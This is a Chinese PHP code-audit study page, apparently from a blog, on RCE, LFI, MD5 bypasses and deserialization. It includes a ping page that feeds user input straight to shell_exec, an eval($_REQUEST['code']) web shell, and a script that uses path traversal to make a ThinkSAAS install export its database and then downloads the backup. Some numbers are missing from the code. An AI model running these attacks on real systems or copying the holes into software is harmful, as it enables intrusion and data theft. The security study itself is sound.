RCE

RCE函数

eval、preg_replace + /e模式、assertJavascript:evalVbscript: Execute、EvalPython:exec
<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/header.php'); ?>

  <br/><b>Ping:</b>Please Enter Domain Name or IP Address: <br/><br/>

  <form action="cmd.php" method="get">

  <input type="text" name="host" value=""/>

  <br/><br/><input type="submit" name="Go" value="Go"/>

  </form>

  <br/>

<?php

if(isset($_GET['host']))

{

if(strtoupper(substr(PHP_OS, , )) === 'WIN')

{

$result=shell_exec("ping ".$_GET['host']);

}

else

{

$result=shell_exec("ping -c 4 ".$_GET['host']);

}

echo "<b>Result:</b></br><pre>".$result."</pre>";

}

?>

<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/footer.php'); ?>
<?php

eval($_REQUEST['code']);

?>

 LFI -》 备份文件下载

<?php

//插件条件入口

defined('IN_TS') or die('Access Denied.');

if(is_file('plugins/'.$app.'/'.$plugin.'/'.$in.'.php')){

    require_once('plugins/'.$app.'/'.$plugin.'/'.$in.'.php');

}else{

    tsNotice('sorry:no plugin!');

}

defined('IN_TS') or die('Access Denied.');

switch($ts){

    case "":

        //输出备份文件

        $arrSqlFile = tsScanDir('data/baksql','file');

        include template('sql');

        break;

    //优化

    case "optimize":

        $arrTables = $db->fetch_all_assoc("SHOW TABLES");

        foreach($arrTables as $key=>$item){

            $db->query("OPTIMIZE TABLE `".$item."` ");

        }

        qiMsg('优化数据库成功!');

        break;

    //备份导出

    case "export":

        require_once 'thinksaas/DbManage.php';

        $bakdb = new DBManage ( $TS_DB['host'].':'.$TS_DB['port'], $TS_DB['user'], $TS_DB['pwd'], $TS_DB['name'], 'utf8' );

        $bakdb->backup ('','data/baksql/');

        qiMsg('数据库备份完毕!');

        break;

?php

date_default_timezone_set('Asia/Hong_Kong');

$url = "http://192.168.116.129/thinksaas/index.php?app=user&ac=plugin&plugin=face&in=my5t3ry/../../../../app/system/action/sql&ts=export";

file_get_contents($url);

$time = date('YmdHis');

for($i = $time; $i <= $time + ; $i++){

    $filename = $i ."_all_v1.sql";

    $url = "http://192.168.116.129/thinksaas/data/baksql/".$filename;

    if (@file_get_contents($url, null, null, -, )){

        echo $url;

    }

}

?>

php绕过MD5 - 科学计数法绕过

php绕过MD5 - 数组全等绕过

PHP版本漏洞

PHP5..x     00截断        例如url输入的文件名1.txt%.jpg经过url转码后会变为1.txt\.jpg

反序列化

常见魔术方法 
__construct()__destruct()__call()__callStatic()__get()__set()__isset()__unset()__sleep()__wakeup()__toString()__invoke()__set_state()__clone(),
__debugInfo() 

逻辑判断 -
CVE-2016-7124(__wakeup()魔术方法绕过)  漏洞影响版本:PHP5 < 5.6.25 | PHP7 < 7.0.1
框架反序列化

Joomla反序列化漏洞

框架漏洞

thinkphp    thinkphp5远程代码执行漏洞

修复 - 》 ThinkPHP .0系列升级到 5.0. ,ThinkPHP .1系列升级到 5.1.

RCE - 防御

防御

. 尽量少用执行命令的函数或者直接禁用

. 参数值尽量使用引号包括

. 在使用动态函数之前,确保使用的函数是指定的函数之一

. 在进入执行命令的函数/方法之前,对参数进行过滤,对敏感字符进行转义

. 能使用脚本解决的工作,不要调用其他程序处理。尽量少用执行命令的函数,并在disable_functions中禁用

. 对于可控点是程序参数的情况下,使用escapeshellcmd函数进行过滤,对于可控点是程序参数值的情况下,使用escapeshellarg函数进行过滤

. 参数的值尽量使用引号包裹,并在拼接前调用addslashes进行转义

而针对由特定第三方组件引发的漏洞,我们要做的就是及时打补丁,修改安装时的默认配置

应用安全 - 代码审计 - PHP的更多相关文章

  1. PHP代码审计中你不知道的牛叉技术点

    一.前言 php代码审计如字面意思,对php源代码进行审查,理解代码的逻辑,发现其中的安全漏洞.如审计代码中是否存在sql注入,则检查代码中sql语句到数据库的传输 和调用过程. 入门php代码审计实 ...

  2. 技术专题-PHP代码审计

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/24472674来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 一.前言 php代码审计如字面 ...

  3. 关于PHP代码审计和漏洞挖掘的一点思考

    这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出. PHP的漏洞有很大一部分是来自于程序员本身的经验不足,当然和服务器的配置有关,但那属于系统安全范畴了,我不太懂 ...

  4. Kindeditor 代码审计

    <?php /** * KindEditor PHP * * 本PHP程序是演示程序,建议不要直接在实际项目中使用. * 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置. * */ r ...

  5. 一个CMS案例实战讲解PHP代码审计入门

    前言 php代码审计介绍:顾名思义就是检查php源代码中的缺点和错误信息,分析并找到这些问题引发的安全漏洞. 1.环境搭建: 工欲善其事必先利其器,先介绍代码审计必要的环境搭建 审计环境 window ...

  6. php代码审计基础笔记

    出处: 九零SEC连接:http://forum.90sec.org/forum.php?mod=viewthread&tid=8059 --------------------------- ...

  7. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.同上一篇,我 ...

  8. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 2.全局防护Bypass之UrlDecode

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.遇到这种情况 ...

  9. PHP代码审计】 那些年我们一起挖掘SQL注入 - 1.什么都没过滤的入门情况

    0x01 背景 首先恭喜Seay法师的力作<代码审计:企业级web代码安全架构>,读了两天后深有感触.想了想自己也做审计有2年了,决定写个PHP代码审计实例教程的系列,希望能够帮助到新人更 ...

  10. 【转】PHP代码审计

    PHP代码审计 目录 1. 概述3 2. 输入验证和输出显示3 2.1 命令注入4 2.2 跨站脚本4 2.3 文件包含5 2.4 代码注入5 2.5 SQL注入6 2.6 XPath注入6 2.7 ...

随机推荐

  1. STM32F407 正点原子按键输入实验

    库函数版本: 库函数 源文件 头文件 GPIO_Init(GPIOE, &GPIOE_initstructure) stm32f4xx_gpio.c stm32f4xx_gpio.h RCC_ ...

  2. STM32 总线

    AHB,是Advanced High performance Bus的缩写,译作高级高性能总线,这是一种“系统总线”.AHB主要用于高性能模块(如CPU.DMA和DSP等)之间的连接.AHB 系统由主 ...

  3. Tensorflow揭秘

    https://www.bilibili.com/video/av64970827/?p=7 tf2.0主要使用tf.keras api来构建模型,主要包括如下几个部分 一.Layers 如下是一些特 ...

  4. Codeforces 954 dijsktra 离散化矩阵快速幂DP 前缀和二分check

    A B C D 给你一个联通图 给定S,T 要求你加一条边使得ST的最短距离不会减少 问你有多少种方法 因为N<=1000 所以N^2枚举边数 迪杰斯特拉两次 求出Sdis 和 Tdis 如果d ...

  5. vi编辑器的快捷键汇总

    光标控制命令 本人qq群也有许多的技术文档,希望可以为你提供一些帮助(非技术的勿加). QQ群:   281442983 (点击链接加入群:http://jq.qq.com/?_wv=1027& ...

  6. 转 Nacos集群环境搭建

    转载 送上nacos-server-1.1.3 链接:https://pan.baidu.com/s/11r3OeffHN8AwKLurmmzJmg  密码:wdu2 下载↓↓↓↓ https://g ...

  7. Qt 打包release发布问题

    除了使用depens查看exe依赖的dll,本文使用qt5.13自带的打包工具windeployqt.exe tips: demo.exe(x86) :C:\Qt\Qt5.12.3\5.12.3\ms ...

  8. git的fetch

    1.git fetch 会从远程分支上下载 2.git pull 会将本地库更新至远程库最新状态

  9. LeetCode--096--不同的二叉搜索树(python)

    我的思路比较low直接看官方题解吧... class Solution: def numTrees(self, n: int) -> int: G = [0] * (n+1) G[0],G[1] ...

  10. 02-webpack的作用

    webpack的作用,将不同静态资源的类型打包成一个JS文件,在html页面应用该JS文件的时候,JS文件里的html就可以正常的运行,去执行操作. 也可以加载前端页面的CSS样式.Img图片